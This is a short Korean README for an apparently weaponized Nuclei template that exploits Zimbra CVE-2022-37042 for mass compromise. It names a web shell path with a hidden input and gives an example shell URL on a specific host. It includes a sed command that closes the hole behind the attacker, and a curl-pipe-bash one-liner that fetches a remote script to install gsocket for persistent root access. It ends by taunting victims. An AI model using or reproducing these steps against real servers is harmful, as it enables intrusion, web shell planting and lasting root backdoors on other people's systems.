
Zimbra CVE-2022-37042 Nuclei weaponized template
셸 경로: /public/formatter.jsp
Nuclei 자체: https://github.com/projectdiscovery/nuclei
셸에는 불투명도 0인 숨겨진 입력이 있으므로 마우스를 올리기만 하면 명령을 입력한 후 [Enter] 키를 누르면 됩니다:
예시 셸 URL:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
다음 명령을 실행하세요 (한 번만):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
Nginx가 아닌 Apache를 사용하는 서버에는 추가 코드가 필요합니다. Pull Request를 환영합니다.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
이 명령은 global-socket (https://www.gsocket.io/deploy/)을 설치하고 루트로 접속할 수 있는 키를 제공합니다.
생일 축하 학살, 이 놈들아 ;)